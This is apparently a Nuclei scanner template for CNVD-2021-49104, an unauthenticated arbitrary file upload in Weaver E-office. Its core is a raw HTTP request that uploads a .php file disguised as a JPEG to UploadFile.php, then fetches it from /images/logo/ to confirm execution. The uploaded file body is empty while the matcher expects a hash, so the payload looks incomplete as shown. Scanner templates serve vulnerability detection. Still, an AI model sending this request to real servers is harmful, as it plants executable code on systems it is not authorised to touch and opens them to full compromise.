id: CNVD-2021-49104 info: name: Pan Micro E-office File Uploads author: pikpikcu severity: critical description: The Pan Wei Micro E-office version running allows arbitrary file uploads from a remote attacker. reference: - https://chowdera.com/2021/12/202112200602130067.html - http://v10.e-office.cn classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L cvss-score: 9.9 cwe-id: CWE-434 remediation: Pan Wei has released an update to resolve this vulnerability. tags: pan,micro,cnvd,cnvd2021,fileupload,intrusive requests: - raw: - | POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 --e64bdf16c554bbc109cecef6451c26a4 Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.php" Content-Type: image/jpeg --e64bdf16c554bbc109cecef6451c26a4-- - | GET /images/logo/logo-eoffice.php HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - "94d01a2324ce38a2e29a629c54190f67" - type: status status: - 200 # Enhanced by cs on 2022/02/28